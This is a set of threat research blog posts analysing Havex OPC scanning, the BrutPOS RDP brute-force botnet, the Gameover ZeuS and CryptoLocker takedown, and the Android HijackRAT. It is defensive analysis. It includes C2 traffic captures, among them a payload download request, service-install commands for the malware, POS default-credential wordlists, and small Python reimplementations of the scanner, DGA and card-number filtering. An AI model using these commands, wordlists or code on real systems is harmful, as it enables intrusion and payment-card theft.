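    return bz2.decompress(xor_bytes(resource, TYU_XOR_KEY))
```

Because XOR is its own inverse, the same `xor_bytes` helper also re-encodes a resource, which makes round-trip testing straightforward.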

A sample encrypted log file (%TEMP%\[random].tmp.yls) is below.














00000000  32 39 0a 66 00 66 00 30  00 30 00 66 00 66 00 30  29.f.f.0.0.f.f.0
00000010  00 30 00 66 00 66 00 30  00 30 00 66 00 66 00 30  .0.f.f.0.0.f.f.0
00000020  00 30 00 66 00 66 00 30  00 30 00 66 00 66 00 30  .0.f.f.0.0.f.f.0
00000030  00 30 00 66 00 66 00 30  00 30 00 66 00 37 39 36  .0.f.f.0.0.f.796
00000040  0a 31 32 38 0a 96 26 cc  34 93 a5 4a 09 09 17 d3  .128..&.4..J....
00000050  e0 bb 15 90 e8 5d cb 01  c0 33 c1 a4 41 72 5f a5  .....]...3..Ar_.
00000060  13 43 69 62 cf a3 80 e3  6f ce 2f 95 d1 38 0f f2  .Cib....o./..8..
00000070  56 b1 f9 5e 1d e1 43 92  61 f8 60 1d 06 04 ad f9  V..^..C.a.`.....
00000080  66 98 1f eb e9 4c d3 cb  ee 4a 39 75 31 54 b8 02  f....L...J9u1T..
00000090  b5 b6 4a 3c e3 77 26 6d  93 b9 66 45 4a 44 f7 a2  ..J<.w&m..fEJD..
000000A0  08 6a 22 89 b7 d3 72 d4  1f 8d b6 80 2b d2 99 5d  .j"...r.....+..]
000000B0  61 87 c1 0c 47 27 6a 61  fc c5 ee 41 a5 ae 89 c3  a...G'ja...A....
000000C0  9e 00 54 b9 46 b8 88 72  94 a3 95 c8 8e 5d fe 23  ..T.F..r.....].#
000000D0  2d fb 48 85 d5 31 c7 65  f1 c4 47 75 6f 77 03 6b  -.H..1.e..Guow.k


--Truncated--

Probable Key Identifier: ff00ff00ff00ff00ff00ff00ff00f
RSA Encrypted 3DES Key:  5A EB 13 80 FE A6 B9 A9 8A 0F 41… (the 3DES key is the last 24 bytes of the decrypted result)
3DES IV:                 88 72 94 a3 95 c8 8e 5d
3DES Encrypted Log:      fe 23 2d fb 48 85 d5 31 c7 65 f1…

Figure 8: Sample encrypted .yls file


When executing PE.dll against the Arduino OPC server, we observe interesting responses within the plaintext %TEMP%\[random].tmp.dat:






Figure 9: Sample scan log

The contents of the tmp.dat file are the results of the scan of the network devices, looking for OPC servers. These are not the in-depth results of interrogating the OPC servers themselves; they reflect only the initial scanning.

The particular Havex sample in question also enumerates OPC tags and fully interrogates the OPC servers identified within %TEMP%\[random].tmp.dat. The particular fields queried are: server state, tag name, type, access, and id. The contents of a sample %TEMP%\OPCServer[random].txt can be found below:






Figure 10: Contents of OPCServer[Random].txt OPC interrogation

While we don’t have a particular case study to prove the attackers’ next steps, it is likely that after these files are created and saved, they are exfiltrated to a command and control server for further processing.


Threat intelligence requires understanding all parts of a particular threat, which is why we took a closer look at the OPC functionality of this particular Havex variant. We don’t have a case study showing why the OPC modules were included, and this is the first “in the wild” sample using OPC scanning. It is possible, however, that the attackers used this malware as a testing ground for future operations.

Since ICS networks typically don’t have a high level of visibility into the environment, there are several ways to help minimize some of the risks associated with a threat like Havex. First, ICS environments need the ability to perform full packet capture. This gives incident responders and engineers better visibility should an incident occur.

Also, having mature incident response processes for your ICS environment is important. Having security engineers who also understand ICS environments available during an incident is paramount. Finally, having trained professionals consistently perform security checks on ICS environments is helpful, as it ensures standard security protocols and best practices are followed within a highly secure environment.

We hope that this information will further educate industrial control systems owners and the security community about how the OPC functionality of this threat works and serves as the foundation for more investigation. Still, lots of questions remain about this component of Havex. What is the attack path? Who is behind it? What is their intention? We’re continuing to track this specific threat and will provide further updates as this new tactic unfolds.


We would like to thank Josh Homan for his help and support.

Related MD5s





BrutPOS: RDP Bruteforcing Botnet Targeting POS Systems

There have been an increasing number of headlines about breaches at retailers in which attackers have made off with credit card data after compromising point-of-sale (POS) terminals. However, what is not commonly discussed is the fact that one third of these breaches are a result of weak default passwords in the remote administration software that is typically installed on these systems. [1] While advanced exploits generate a lot of interest, sometimes it’s defending the simple attacks that can keep your company from the headlines.

In this report, we document a botnet that we call BrutPOS which uses thousands of compromised computers to scan specified IP address ranges for RDP servers that have weak or default passwords in an effort to locate vulnerable POS systems. [2]


It is unclear exactly how the BrutPOS malware is being propagated. We have found that the malware is being distributed (along with a considerable amount of otherwise unrelated malware) by the site destre45[.]com. The attackers may have used a distribution service provided by other cybercriminals.

When executed, the malware copies itself to:


It modifies the Windows Registry (HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Run_) so that it will be restarted after a reboot.

The malware connects to the command and control server (C2) to report its status and receives a list of usernames/passwords and IP addresses to begin scanning.


POST /brut.loc/www/cmd.php HTTP/1.1

Content-type: multipart/form-data, boundary=XyEgoZ17

Cache-Control: no-cache

Accept: */*

Accept-Encoding: identity

Connection: Keep-Alive

Accept-Language: ru-RU,en,*

User-Agent: Browser


Content-Length: 212


content-disposition: form-data; name="data"

{ "bad" : 0, "bruting" : false, "checked" : 1, "done" : true, "errors" : 0, "good" : 0, "goodslist" : "", "pps" : 0.0, "threads" : 5, "v" : "0.0.0" }

HTTP/1.1 200 OK

Date: Fri, 20 Jun 2014 13:22:53 GMT

Server: Apache/2.2.22 (@RELEASE@)

X-Powered-By: PHP/5.3.3

Set-Cookie: PHPSESSID=o68hcjj8lhkbprfbdkbj50lrr0; path=/

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Content-Length: 2056

Connection: close

Content-Type: text/html; charset=UTF-8

{"passwords":"backupexec\r\nbackup\r\npassword\r\nPassword1\r\nPassw0rd\r\nPa$$w0rd1\r\nPass@word\r\nPassword\r\nclient\r\nP@ssw0rd\r\np@$$w0rd\r\npassw0rd\r\np@ssw0rd\r\npa$$w0rd","logins":"backupexec\r\nbackup\r\ndatacard","servers":"[IP ADDRESSES REDACTED]","botstart":"1","stamp":1308301912,"newthreads":5,"interval":50}
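The task message shown above is plain JSON with \r\n-delimited credential lists. A client-side view of how an implant might consume it (field names taken from the capture; the helper name and the shortened example payload are ours):

```python
import json

def parse_task(raw: str) -> dict:
    """Split the newline-delimited credential lists out of a C2 task message."""
    task = json.loads(raw)
    return {
        "logins": task["logins"].split("\r\n"),
        "passwords": task["passwords"].split("\r\n"),
        "threads": task["newthreads"],
        "interval": task["interval"],
    }

# Abbreviated example modeled on the captured response (servers redacted):
example = ('{"passwords":"backup\\r\\npassword\\r\\nPassword1",'
           '"logins":"backupexec\\r\\nbackup\\r\\ndatacard",'
           '"servers":"","botstart":"1","stamp":1308301912,'
           '"newthreads":5,"interval":50}')
task = parse_task(example)
```

Each bot then spins up `threads` brute-forcing workers against the supplied server ranges.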

The infected system begins to make connections to port 3389; if the port is open, it adds the IP to a list of servers to be brute-forced with the supplied credentials. If the infected system successfully brute-forces an RDP server, it reports back with the credentials.
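The scanner’s first step, testing whether TCP 3389 answers at all, amounts to a connect with a timeout. A minimal sketch of that check (the port is parameterized here purely for testability; the bot hardcodes 3389):

```python
import socket

def rdp_port_open(host: str, port: int = 3389, timeout: float = 1.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False
```

Only hosts that pass this check are handed to the credential-guessing workers, which keeps the brute-force phase focused on live RDP endpoints.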

In total we found five C2 servers used by the BrutPOS botnet. Three of these servers are located on the same network in Russia; one of them is located in Iran. Only two of these servers remain active at this time.

C2    Country   Network        Status
      Russia    THEFIRST-NET   Active
      Russia    THEFIRST-NET   Active
      Iran      BSG            Inactive
      Russia    THEFIRST-NET   Inactive
      Germany   DE-23MEDIA     Inactive

Based on the compile times of the samples we analyzed that connect to this C2 infrastructure, this botnet was active as of February 2014.

However, one of the active C2 servers was set up on May 28, and we believe the second was set up in early June. We were able to recover information from these two C2 servers in mid-June that allowed us to gain a better understanding of this botnet.

The attackers are able to control the botnet from a web-based administration panel. This panel provides a statistical overview of the botnet.


The botnet had a total of 5,622 compromised computers under its control; however, only a fraction of those systems were active at any given time (179 were active when we last checked). This page also displays the “current version” of the malware; if an infected system checks in reporting an earlier version, a new executable is pushed down to it.


The attackers are able to view the details of the infected systems under their control including the IP address and geographic location as well as status of the infected systems’ brute forcing activities (bad / good / errors / threads / version) and the timestamp of the last connection to the C2. The attackers may also specify commands such as “reload” and “delete”.

Based on the IP addresses on this page, there are 5622 infected systems spread across 119 countries.

Country Count Percentage
Russia    881   15.67%
India     756   13.45%
Vietnam   422    7.51%
Iran      341    6.07%
Taiwan    232    4.13%
Ukraine   151    2.69%
Turkey    139    2.47%
Serbia    115    2.05%
Egypt     110    1.96%
Mexico    106    1.89%


This page lists the ranges of IP addresses that the attackers can specify to be scanned for RDP access and brute forced.


In total, the attackers specified 57 IP address ranges, the majority of which (32) are located in the U.S.


The attackers can specify the usernames and passwords that the infected systems use to brute-force available RDP servers. Some of the usernames and passwords indicate that the attackers are looking for specific brands of POS systems (such as Micros). [3]

Usernames       Passwords
admin           Admin
administrator   admin
backup          Administrat0r
backupexec      Administrator
data            administrator
datacard        backup
manager         backupexec
micros          client
microssvc       client1
pos             datacard
                @dm1n
                @dmin
                micros
                p0s
                Passw0rd
                Passw0rd1
                Password
                Pass@word
                password
                Password1
                Pa$$w0rd1
                Pa$$word
                pa$$word
                pos
                P@ssw0rd
                p@ssword
                p@ssword1
                p@$$w0rd



When an infected system reports back a successful RDP login, the attackers store the username/password and IP address of the RDP server as well as the IP address of the infected system that successfully brute forced it.


Of the 60 “good” RDP servers listed by the attackers, the majority (51) were located in the U.S. The most common username was “administrator” (36), and the most common passwords were “pos” (12) and “Password1” (12).

Payment Card Theft

During our investigation, we discovered another executable that is potentially run on systems once credentials are obtained (e.g. 4aed6a5897e9030f09f13f3c51668e92). This variant is intended to extract payment card information stored within running processes. It has two distinct code paths depending on its ability to get debug permissions by calling RtlAdjustPrivilege(0x14, 1, 0…). This may be an attempt to identify a POS configuration. If it succeeds in getting debug permissions, it downloads an executable and executes it:


GET /brut.loc/www/bin/1.exe HTTP/1.1

Accept-Encoding: gzip

Connection: Keep-Alive

Accept-Language: ru-RU,en,*

User-Agent: Browser



If the malware fails to get debug permissions, it copies itself to %WINDIR%\lsass.exe and installs itself as a service. The following script is used to create and start the service:


sc create winserv binpath= C:\WINDOWS\lsass.exe type= own start= auto

sc start winserv

del 1.bat


When running as a service, the program scans the memory of all processes, with the exception of csrss.exe and conhost.exe, for potential payment card information. Candidates are verified using the Luhn checksum and saved to winsrv.sys, which is then uploaded via FTP to the attackers’ server.
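The Luhn checksum used to validate card-number candidates is a standard algorithm (this is our sketch of it, not the malware’s actual code): double every second digit from the right, subtract 9 from any doubled result over 9, and check that the sum is divisible by 10.

```python
def luhn_valid(number: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    if not number.isdigit():
        return False
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:        # every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0
```

This filter is cheap and dramatically cuts false positives when scraping raw process memory for 13- to 19-digit sequences.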

Before connecting to the FTP server, the implant connects to smtp[.]gmail[.]com on port 25 and obtains the victim’s external IP address from the EHLO response. winsrv.sys is uploaded to the FTP server using a filename consisting of a capital letter followed by the IP address. The letter prefix starts at ‘A’ and is incremented through ‘Z’ for each new file. If the IP address can’t be obtained from smtp[.]gmail[.]com, a random four-digit number is generated instead.
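The upload-naming scheme just described can be sketched as a small generator (helper name is ours; the IP below is a documentation address):

```python
import random
import string

def upload_filenames(external_ip=None):
    """Yield FTP upload names: 'A' + IP, 'B' + IP, ..., 'Z' + IP.
    If the external IP could not be learned from the EHLO response,
    a random four-digit number stands in for it."""
    suffix = external_ip if external_ip else f"{random.randint(0, 9999):04d}"
    for prefix in string.ascii_uppercase:
        yield prefix + suffix
```

For defenders, this predictable A-through-Z prefix plus an IP address is a useful pattern to hunt for in FTP server logs.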


While there is insufficient information to determine attribution, there is some information which indicates that the attackers are in Eastern Europe, probably Russia or Ukraine. In addition to the Russian language interface, we recovered web server logs and parsed out the six IP addresses that used the administration interface.

Two of the IP addresses were from PEOPLE-NET, an ISP in Ukraine. In both cases the “User-Agent” indicates that the requests were coming from an Alcatel mobile phone running Android:

"Mozilla/5.0 (Linux; Android 4.1.1; ALCATEL ONE TOUCH 5020D Build/JRO03C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.72 Mobile Safari/537.36 OPR/19.0.1340.69721"

Another Ukrainian IP address, from the UKRTELNET-ADSL ISP, was also used. However, the “User-Agent” in this case was Firefox:

"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0"

There were also connections from an IP range in Russia assigned to the network “Macroregional_South” in Volgograd.

In addition to these connections, there were also connections from the U.K. and France; however, these were made through commercial VPN services.


In order to understand the attackers’ intentions, we decided to set up a Windows 2008 R2 server with POS software and allow the attackers to compromise it. In addition to the POS software, we also put documents containing fake credit card information on the desktop. By mimicking the traffic generated by the infected systems under the attackers’ control, we were able to send a username and password combination of “micros” and “admin” to the C2. We then waited for the attackers to connect.

We saw the attackers connect to the RDP instance 27 minutes after the fake username and password combination were sent to the C2. The attackers connected from three IP addresses. One of the IP addresses was in the same Ukrainian IP address range assigned to PEOPLE-NET that we saw in the C2 logs. Another was the same VPN based in the UK, while the third was assigned to INETHN in Honduras.

After connecting, the attackers immediately opened the document containing the fake credit card information, then exited the system shortly afterward. The second access occurred 4 minutes later, with little activity. The third access occurred 18 minutes later; on this access, the attackers attempted, unsuccessfully, to open the POS software. The fourth access happened two minutes later, with very little activity. The fifth and final access happened approximately 4 hours later, during which the attackers formatted the drive in an attempt to wipe their data trails.


POS systems remain a high-priority target for cybercriminals. Based on a simple scanning attack, the attackers in this case were able to leverage their botnet of over 5,000 machines to acquire access to 60 systems in two weeks.

While new malware and more advanced attacks continue to appear, standard attacks against weak passwords for remote administration tools still present a significant threat.



2. The BrutPOS malware was initially identified in March 2014, but the full scope of the botnet was still unknown at that time.

3. Micros sells POS systems for the retail and hospitality industries.


We would like to thank Josh Gomez for his help and support.


4c3d65c1d8e1d7a2815c0031be41efc7: BrutePOS_Brute

7391ff6f34f79df0ec7571f7afbf8f7a: BrutePOS_Brute

280d920531ba67d8fd81350877914985: BrutePOS_Brute

96487eb38687e84405f045f7ad8a115c: BrutePOS_Brute

c1fab4a0b7f4404baf8eab4d58b1f821: BrutePOS_Brute

6bcff459fbca8a64f1fd74be433e2450: BrutePOS_Brute

daae858fe34dcf263ef6230d887b111d: BrutePOS_Brute

31bd8dd48ac0de3d4da340bf29f4d280: BrutePOS_Brute

0f2266f63c06c0fee3ff999936c7c10a: BrutePOS_Brute

4d4fd96fabb1c525eaeeae8f2652ffa6: BrutePOS_Brute

da6d727ddf096b6654406487bf22d26c: BrutePOS_Brute

fd58144a4cd354bfd09719ac2ccd3511: BrutePOS_Brute

e38e42f20e027389a86d6a5816a6d8f8: BrutePOS_Brute

08863d484b1ebe6359144c9a8d8027c0: BrutePOS_Brute

4ab3a6394a3a1860a6c52cf92d7f7560: BrutePOS_Brute

0e58848506a525c755cb0dad397c1c44: BrutePOS_Brute

60c16d8596063f6ee0eae579f201ae04: BrutePOS_Brute

b2d4fb4977630e68107ee87299a714e6: BrutePOS_Brute

68ba1afd4585b9355cf7009f4604a208: BrutePOS_Brute

9d3d769d3feea92fd4794fc3c59e32df: BrutePOS_Brute

b63581fcf0ff86bb771c3c33205c78ca: BrutePOS_Brute

18eba6f28ab6c088d9fc22b4cc154a77: BrutePOS_Brute

4802539350908fd447a5c3ae3e966be0: BrutePOS_Brute

cbbb68f6d8eda1071078a02fd79ed3ec: BrutePOS_Brute

8ba3c7ccd0a61d5c9a8b94a71ce06328: BrutePOS_Brute

9b8de98badede7f837a34e318b12d842: BrutePOS_Brute

78f4a157db42321e8f61294bb39d7a74: BrutePOS_FTP_Exfil

f36889f30b62a7524bafc766ed78b329: BrutePOS_FTP_Exfil

95b13cd79621931288bd8a8614c8483f: BrutePOS_FTP_Exfil

4aed6a5897e9030f09f13f3c51668e92: BrutePOS_FTP_Exfil

06d8d8e18b91f301ac3fe6fa45ab7b53: BrutePOS_FTP_Exfil

faddbf92ab35e7c3194af4e7a689897c: BrutePOS_FTP_Exfil

Operation Tovar: The Latest Attempt to Eliminate Key Botnets

Coordinated botnet disruptions have increased in pace and popularity over the last few years as more private companies work with international law enforcement agencies to combat malware infections on a grand scale. Operation Tovar, announced on June 2, 2014, is the latest to make headlines. The target of the investigation, Evgeniy Mikhailovich Bogachev, was indicted by the Department of Justice and is wanted by the FBI for his role as alleged leader of the Gameover ZeuS and CryptoLocker botnets. Four other defendants were indicted under their pseudonyms. Though Bogachev’s current activities aren’t known, the Operation Tovar task force has maintained control of the botnet infrastructure and remediation efforts are ongoing.

While new malware strains are released with increasing frequency, it’s easy to forget why Gameover and CryptoLocker are worthwhile targets for takedown operations. Both offered more advanced features than their peers and typified the increasingly sophisticated cybercriminal enterprises behind botnets.

Gameover ZeuS

Since the ZeuS source code was released in 2011, several new variants have appeared in the wild. Citadel, KINS, ICE IX, and Gameover have all improved upon the basic ZeuS model by introducing new features, using better encryption, and modifying command and control (C2) communication methods.

Gameover uses a peer-to-peer (P2P) system for C2 communication. Though other P2P botnets such as Kelihos exist, Gameover is notable for its use of proxy nodes to introduce complexity into the standard P2P infrastructure. These proxy nodes are specific machines designated as relay points through which the botnet operators send commands and receive stolen information. This minimizes the number of systems that actually communicate with C2 servers. C2 commands are signed using RSA-2048 and encrypted with RC4 making it very difficult to tamper with the botnet.
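As a refresher on the cipher involved: RC4 is a small stream cipher in which encryption and decryption are the same operation. The sketch below is purely illustrative (it is not Gameover’s actual code, key material, or key schedule):

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4: key-scheduling algorithm (KSA) followed by the
    pseudo-random generation algorithm (PRGA). Applying the function
    twice with the same key round-trips the data."""
    # KSA: permute the state array based on the key
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # PRGA: generate keystream bytes and XOR them with the data
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

ct = rc4(b"secret-key", b"botnet command")  # hypothetical key and command
pt = rc4(b"secret-key", ct)                 # same call decrypts
```

Note that RC4 alone provides no integrity, which is why the operators layered RSA-2048 signatures on top: a bot can verify that a command really came from the operators before acting on it.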

Additionally, Gameover maintains a failsafe mechanism: a domain generation algorithm (DGA) that produces 1,000 domains each week. This feature enables the operators to maintain control of their botnet even if the P2P infrastructure is compromised. The DGA produces long, nonsensical strings at one of six top-level domains: .com, .net, .org, .biz, .info, and .ru that can be registered and used to send commands to the botnet.
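To illustrate the concept (this is not Gameover’s actual algorithm; the seed string, hash, and label length here are invented for the sketch), a DGA of this style can be as simple as deriving deterministic domains from a shared seed and the current week:

```python
import hashlib

TLDS = [".com", ".net", ".org", ".biz", ".info", ".ru"]

def weekly_domains(seed: str, year: int, week: int, count: int = 1000) -> list[str]:
    """Illustrative DGA: bots and operators both run this, so they agree
    on the same 1,000 candidate domains for a given week without any
    direct communication."""
    domains = []
    for i in range(count):
        digest = hashlib.md5(f"{seed}-{year}-{week}-{i}".encode()).hexdigest()
        # long, nonsensical label plus one of the six TLDs
        domains.append(digest[:20] + TLDS[i % len(TLDS)])
    return domains

doms = weekly_domains("example-seed", 2014, 23)
```

Because the output is deterministic, defenders who reverse engineer the algorithm can precompute every future domain, which is exactly what made the sinkholing described later possible.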

ZeuS and all its variants are information-stealing trojans. We refer to them as banking trojans because that’s where they excel and Gameover is no exception. Gameover is able to trick the user into handing over personal information and can even defeat two-factor authentication. It accomplishes this by injecting custom code into the browser when a victim visits certain websites. Gameover’s arsenal of bank account takeover tools includes 1,500 web injections that were custom-made to target the websites of more than 700 financial institutions worldwide.

In addition to its exceptional abilities as a banking trojan, Gameover is capable of a wider variety of data theft activities. An Operation Tovar task force member, speaking to Brian Krebs on the condition of anonymity, said they have evidence of additional harvested data and that Gameover targeted proprietary information.


Not content with merely engaging in widespread banking credential and information theft, the Gameover criminal operators decided to maximize returns by infecting systems with CryptoLocker, a type of ransomware that encrypts the files on infected machines and then demands a ransom of hundreds of dollars in exchange for a decryption key. Typically, victims were given 72 hours to pay the ransom in bitcoins or risk losing their data.

Unwilling to miss out on any opportunity to generate revenue, the criminal operators set up a website to assist victims in paying the ransom in bitcoins. Through this website, victims could complete the transaction and track the status of their “order” – the ransom payment in exchange for the decryption key. Some victims, unwilling or unable to pay the ransom, missed the 72-hour deadline only to see the ransom demand increase fivefold.

Law enforcement officials discouraged people from paying the ransom since it would fund a criminal organization, but without backups many victims had little choice but to pay. A US police department paid $750 for two Bitcoins as ransom after CryptoLocker was installed on a system used for police reports and booking photos. CryptoLocker encrypts files using asymmetric encryption, making use of a public and a private key. Without the private key, held on the criminals’ servers, infected files probably cannot be decrypted.

The Target

Operation Tovar’s investigation began with a server in the UK. A trail of wire transfers, money mules, criminal servers, and at least one confidential source led investigators to Bogachev. He is a Russian citizen wanted on charges of conspiracy to participate in racketeering activity, bank fraud, conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to violate the Identity Theft and Assumption Deterrence Act, aggravated identity theft, conspiracy, computer fraud, wire fraud, and money laundering. The FBI estimates the financial toll of Gameover at over $100 million and another estimate is that more than $27 million in ransom payments were made in the first two months of CryptoLocker’s distribution.

Obtaining an indictment against a Russian national who will likely never be extradited to the United States isn’t sufficient to put an end to a criminal organization. In 2011, Russian citizen Aleksandr Andreevich Panin was indicted in the US on 23 counts related to the development and distribution of SpyEye but was not arrested until 2013 when he flew through Hartsfield-Jackson Atlanta International Airport. The Russian government, in a travel warning to its citizens, specifically mentions Panin and recommends that Russians facing legal action in the US should refrain from travelling internationally.

The Takeover

Drawing on the technical expertise of its members, the Operation Tovar task force was able to exploit flaws in the design of Gameover’s P2P network to manipulate the peer list and redirect traffic to nodes under its control. The specific technical details have not been released to the public in order to prevent the criminals from regaining control.

Gameover’s failsafe mechanism, the DGA that was supposed to have allowed the criminals to maintain control in the event of a P2P disruption, was reverse engineered by task force members. The FBI then obtained a restraining order to redirect any attempts to register those domains to a government-run server. Furthermore, US service providers are required to block connections to the Russian .ru domains generated by the DGA since the US has no jurisdiction to prevent their registration.

CryptoLocker also used a DGA for determining C2 locations. The algorithm was reverse engineered and the C2 servers were identified and seized by the Operation Tovar task force. Due to the use of an asymmetric key algorithm, CryptoLocker victims whose files remain encrypted currently have no avenue of remediation.

Operation Tovar’s success can be measured by two factors: (1) Have the criminals regained control of their botnets and (2) Is the malware being removed from infected machines? While we can’t say for certain that the people responsible for Gameover and CryptoLocker have ceased all criminal activity, they have not regained control of the network disrupted by Operation Tovar. Based on this fact alone, the task force should be commended. Successful botnet disruptions are very challenging. Attempted takedowns of Kelihos have been undone after only two weeks.

The remediation of infected machines is an even more difficult task. US-CERT has published a list of recommended actions and resources, and a number of the private companies involved in Operation Tovar have released scanning tools. The onus remains on individuals and organizations to use these resources to determine if they are infected and take the appropriate steps to remediate the problem. Statistics published by The Shadowserver Foundation show the number of machines infected with Gameover has remained essentially flat since the takeover. There are simply not enough people taking advantage of the resources available to remediate their systems.


Now that the task force has taken control of the C2 network, some people may believe that the malware is neutered and no further action is required. It is important to remember that any malware is unauthorized code running on a computer. The integrity of the system is still compromised, regardless of who is in control of the botnet.

Announcing the FLARE Team and The FLARE On Challenge

I would like to announce the formation of the FireEye Labs Advanced Reverse Engineering (FLARE) team. As part of FireEye Labs, the team’s focus is to support all of FireEye and Mandiant from a reverse engineering standpoint. Many FireEye groups have reverse engineering needs: Global Services discovers malware during incident response, Managed Defense constantly discovers threats on monitored client networks, and Products benefit from in-depth reversing to help improve detection capabilities.

We primarily focus on malware analysis, but we also perform red-teaming of software and organizations, and we develop tools to assist reverse engineering. Our research and tools assist with automatic malware triage to quickly get initial results out to incident responders in the field. Auto-unpackers unravel obfuscated samples without the need for an analyst. Automatically clustering and classifying samples helps identify whether a binary is good or bad and whether we have analyzed it before. We develop reverse engineering scripts for IDA Pro and systems that help us quickly share our analysis results. We also write scripts that can help incident responders decrypt and interpret malware network traffic and host artifacts.

This elite technical enclave of reversers, malware analysts, researchers, and teachers will team up with our FireEye Labs peers to help bring the best detection to our customers and promote knowledge sharing with the security research community. We’ll continue to provide technical training on malware analysis privately and at conferences like Black Hat. Look for us to present webinars on malware analysis and a blog series of scripts for IDA Pro to aid reverse engineering of malware.

The Challenge

To commemorate our launch, the FLARE team is hosting a challenge for all reverse engineers and malware analysts. We invite you to compete and test your skills. The challenge runs the gamut of skills we believe are necessary to succeed on the FLARE team. We invite everyone who is interested to solve the challenge and get their just reward!

The puzzles were developed by Richard Wartell, a reverse engineer with a PhD in “IDA Pro” (actually Computer Science, but his thesis used IDA Pro) from the University of Texas at Dallas where he worked on binary rewriting techniques for the x86 instruction set. He recently presented this work at the REcon conference in Montreal. At Mandiant Richard focused on incident response, but now on the FLARE team he reverse engineers malware, teaches malware classes, and helps develop our auto-unpacking technology.

As reverse engineers we’ve seen a variety of anti-reverse engineering techniques. Oftentimes the armoring malware authors employ is sophisticated and requires time to unravel. Sometimes it is misguided and easily circumvented.

Writing these binary puzzles has given us a chance to recreate some of the sophisticated (and sometimes ridiculous) techniques we see. The seven puzzles start with basic skills and escalate quickly to more difficult reversing tasks. At FLARE we have to deal with whatever challenges come our way, so the challenge reflects this. If you take on the challenge you might see malicious PDFs, .NET binaries, obfuscated PHP, JavaScript, x86, x64, PE, ELF, Mach-O, and so on.

And after completing the final challenge, you’ll win a prize and be contacted by a FLARE team member. The full details can be found at:

So on behalf of the FLARE team, I say Happy Reversing!

The Service You Can’t Refuse: A Secluded HijackRAT

In the Android world, sometimes you can’t stop malware from “serving” you, especially when the “service” is actually a malicious Android class running in the background and controlled by a remote access tool (RAT). Recently, FireEye mobile security researchers discovered one such malware, which pretends to be a “Google Service Framework,” kills an anti-virus application, and takes other malicious actions.

In the past, we’ve seen Android malware that performs privacy leakage, banking credential theft, or remote access separately, but this sample takes Android malware to a new level by combining all of those activities into one app. In addition, we found that the hacker has designed a framework to conduct bank hijacking and is actively developing toward this goal. Once the framework is completed, we suspect a batch of bank hijacking malware will follow. Right now, eight Korean banks are recognized by the attacker, yet the hacker can quickly expand to new banks with just 30 minutes of work.

Although the IP addresses we have captured don’t reveal who the attacker is, as the computer of the IP might be a victim as well, we have found from the UI that both the malware developer and the victims are Korean speakers.

[caption id="attachment_5810" align="alignnone" width="545"]Fig. 1. The structure of the HijackRAT malware.[/caption]

The package name of this new RAT malware is “com.ll” and it appears as “Google Service Framework” with the default Android icon. Android users can’t remove the app unless they deactivate its administrative privileges in “Settings.” So far, the Virus Total score of the sample is only five positive detections out of 54 AV vendors [1]. One reason such new malware goes largely undetected at first is that the CNC server the hacker uses changes so rapidly.

[caption id="attachment_5812" align="alignnone" width="548"] Fig. 2. The Virus Total detection of the malware sample. [1][/caption] 

[caption id="attachment_5813" align="alignnone" width="549"] Fig. 3. The fake “Google Service Framework” icon in home screen.[/caption]

A few seconds after the malicious app is installed, the “Google Services” icon appears on the home screen. When the icon is clicked, the app asks for administrative privileges. Once activated, the uninstall option is disabled and a new service named “GS” is started, as shown below. If the user tries to click the icon again, it shows "App isn't installed." and removes itself from the home screen.

[caption id="attachment_5815" align="alignnone" width="548"]Fig. 4. The background service of the malware.[/caption]

The malware supports a range of malicious actions that the RAT can command, as shown below.


Within a few minutes, the app connects with the CNC server and begins to receive a task list from it:


The content is encoded with Base64 (RFC 2045); decoded, it is a JSONObject with the content {"task": {"0": 0}}. The server IP,, is located in Hong Kong. We cannot tell whether it’s the hacker’s IP or a victim IP controlled by the RAT, but the URL is named after the device ID and the UUID generated by the CNC server.
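The decoding step is easy to reproduce. The Base64 string below is simply the RFC 2045 encoding of the {"task": {"0": 0}} payload described above, standing in for the C2 response body:

```python
import base64
import json

# Stand-in for the Base64 (RFC 2045) body returned by the C2 server
body = "eyJ0YXNrIjogeyIwIjogMH19"

# Decode Base64, then parse the resulting JSON task list
task = json.loads(base64.b64decode(body))
print(task)  # {'task': {'0': 0}}
```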

The code below shows how the URL of the HTTP GET request is constructed:



The task list shown above will trigger the first malicious action, “Upload Phone Detail.” When executed, the user’s private information is uploaded to the server using an HTTP POST request. The information contains the phone number, device ID, and contact list, as shown below in the network packet of the request:


When decoded, the contents of the red and blue parts of the PCap are shown below, respectively:

1. The red part:


2. The blue part:


The contact list shown above is already highly sensitive; yet if the user has installed any banking applications, the malware will scan for them too.

On a test device, we installed the eight Korean banking apps shown below:

[caption id="attachment_5822" align="alignnone" width="274"]Fig. 5. The eight banking apps.[/caption]

Once this was done, we found that the value of “banklist” in the PCap was no longer listed as N/A:


The “banklist” entry in the PCap is filled with the short names of the banks that we installed. There is a map of the short names and package names of the eight banking apps installed on the phone:


The map of the banks is stored in a database and used in another malicious action controlled by the CNC server too.
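The storage pattern can be sketched as follows. The short-name-to-package map below uses invented package names (not the values recorded by the malware), and an in-memory SQLite database stands in for the simple_pref database described later:

```python
import sqlite3

# Hypothetical short-name -> package-name map; entries are illustrative only
BANKS = {
    "NH": "com.example.nhbank",
    "BH": "com.example.bhbank",
}

# The malware used a file under /data/data/com.ll/database/simple_pref;
# an in-memory database is used here for the sketch
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE banklist (shortname TEXT PRIMARY KEY, package TEXT)")
conn.executemany("INSERT INTO banklist VALUES (?, ?)", BANKS.items())

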